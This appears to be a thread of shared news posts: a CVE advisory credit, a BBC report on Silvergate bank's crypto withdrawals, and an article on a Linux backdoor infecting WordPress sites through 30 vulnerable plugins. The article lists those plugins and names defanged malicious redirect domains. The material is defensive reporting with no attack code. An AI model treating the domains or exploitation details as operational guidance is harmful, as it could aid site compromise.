The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2023-22851 to this vulnerability.

[-] Credits:
Vulnerability discovered by Egidio Romano.

[-] Original Advisory:
http://karmainsecurity.com/KIS-2023-04

Source
  18. Add an email subscribe, so you don't get into trouble with spam
  19. Customers of US bank Silvergate, which provides cryptocurrency services, have withdrawn over $8bn (£6.7bn) of their crypto-linked deposits.

     Around two-thirds of the bank's customers pulled their deposits in the final three months of 2022. The bank has sold $5.2bn in assets to cover the cost and remain liquid. It came as three US regulators warned banks that issuing or holding crypto was "highly likely to be inconsistent with safe and sound banking practices".

     Silvergate is a bank listed on the New York Stock Exchange, and is therefore regulated within the financial sector. It is one of a small handful of businesses within this sector that provides cryptocurrency services. The withdrawals followed the collapse of the FTX crypto exchange, which was once valued at $32bn before its bankruptcy filing in November. Former FTX boss Sam Bankman-Fried has pleaded not guilty to charges that he defrauded customers and investors. Prosecutors say as many as one million creditors may have lost their money. The case has shaken the entire crypto industry, sparking bankruptcy filings at other firms and declines in crypto values.

     Alan Lane, chief executive of Silvergate, said the bank was selling assets to cover the withdrawals by customers "in response to the rapid changes in the digital asset industry".

     Silvergate is the latest victim of the chilling "crypto winter" that's been whipping through the industry since last spring. The so-called crypto bank occupied a fairly unique position in the market acting as a bank for cryptocurrency companies which struggled to get banking services from traditional sources. One of its customers was the now bankrupt Alameda Research - owned by Sam Bankman-Fried who awaits trial in the US accused of fraud. That in itself is a blow for Silvergate but Bankman-Fried's downfall has delivered a bigger blow to the company - market confidence.

     Since Bankman-Fried's empire collapsed, investors large and small have been pulling their money out of crypto companies with billions transferred from companies that store crypto funds. So far the biggest companies in the space like Binance and Coinbase have survived the unprecedented withdrawals and it appears as though Silvergate is weathering the storm too for now but at a huge cost to its balance sheet.

     Silvergate was a small US bank before it entered the world of cryptocurrency, and went public in November 2019. At the market's peak in 2021, its shares had grown by more than 1,500%, in no small part due to the massive growth of crypto in this period. During this time it tried to launch its own stablecoin - a form of cryptocurrency which is directly tied to an asset such as gold, the US dollar or other cryptocurrencies. And in January 2022, Silvergate spent $182m to acquire the technology behind Meta's proposed Diem (formerly Libra) stablecoin that never saw the light of day.

     In a filing to the US Securities and Exchange Commission, the bank said it had sold debt to cover the withdrawals and had written off the Diem purchase, meaning it is no longer counted as an asset. It has also reduced its staff by 40% - around 200 people - and altogether the withdrawals have caused the bank to lose $718m, a total higher than its profit since 2013.

     Via bbc.com
  20. Link: https://urlscan.io/search/#domain%3A"google.com"
Credit: urlscan GmbH
  21. People who use WordPress should check their sites for unpatched plugins.

Malware that exploits unpatched vulnerabilities in 30 different WordPress plugins has infected hundreds if not thousands of sites and may have been in active use for years, according to a writeup published last week.

The Linux-based malware installs a backdoor that causes infected sites to redirect visitors to malicious sites, researchers from security firm Dr.Web said. It's also able to disable event logging, go into standby mode, and shut itself down. It gets installed by exploiting already-patched vulnerabilities in plugins that website owners use to add functionality like live chat or metrics-reporting to the core WordPress content management system.

Searches such as this one indicate that more than 1,300 sites contain the JavaScript that powers the backdoor. It's possible that some of those sites have removed the malicious code since the last scan. Still, it provides an indication of the reach of the malware.

The plugins exploited include:

WP Live Chat Support Plugin
WordPress – Yuzo Related Posts
Yellow Pencil Visual Theme Customizer Plugin
Easysmtp
WP GDPR Compliance Plugin
Newspaper Theme on WordPress Access Control (vulnerability CVE-2016-10972)
Thim Core
Google Code Inserter
Total Donations Plugin
Post Custom Templates Lite
WP Quick Booking Manager
Facebook Live Chat by Zotabox
Blog Designer WordPress Plugin
WordPress Ultimate FAQ (vulnerabilities CVE-2019-17232 and CVE-2019-17233)
WP-Matomo Integration (WP-Piwik)
WordPress ND Shortcodes For Visual Composer
WP Live Chat
Coming Soon Page and Maintenance Mode
Hybrid
Brizy WordPress Plugin
FV Flowplayer Video Player
WooCommerce
WordPress Coming Soon Page
WordPress theme OneTone
Simple Fields WordPress Plugin
WordPress Delucks SEO plugin
Poll, Survey, Form & Quiz Maker by OpinionStage
Social Metrics Tracker
WPeMatico RSS Feed Fetcher
Rich Reviews plugin

"If one or more vulnerabilities are successfully exploited, the targeted page is injected with a malicious JavaScript that is downloaded from a remote server," the Dr.Web writeup explained. "With that, the injection is done in such a way that when the infected page is loaded, this JavaScript will be initiated first—regardless of the original contents of the page. At this point, whenever users click anywhere on the infected page, they will be transferred to the website the attackers need users to go to."

The JavaScript contains links to a variety of malicious domains, including: lobbydesires[.]com, letsmakeparty3[.]ga, deliverygoodstrategies[.]com, gabriellalovecats[.]com, css[.]digestcolect[.]com, clon[.]collectfasttracks[.]com, Count[.]trackstatisticsss[.]com

The screenshot below shows how the JavaScript appears in the page source of the infected site:

The researchers found two versions of the backdoor: Linux.BackDoor.WordPressExploit.1 and Linux.BackDoor.WordPressExploit.2. They said the malware may have been in use for three years.

WordPress plugins have long been a common means for infecting sites. While the security of the main application is fairly robust, many plugins are riddled with vulnerabilities that can lead to infection. Criminals use infected sites to redirect visitors to sites used for phishing, ad fraud, and distributing malware.

People running WordPress sites should ensure that they're using the most current versions of the main software as well as any plugins. They should prioritize updating any of the plugins listed above.

Source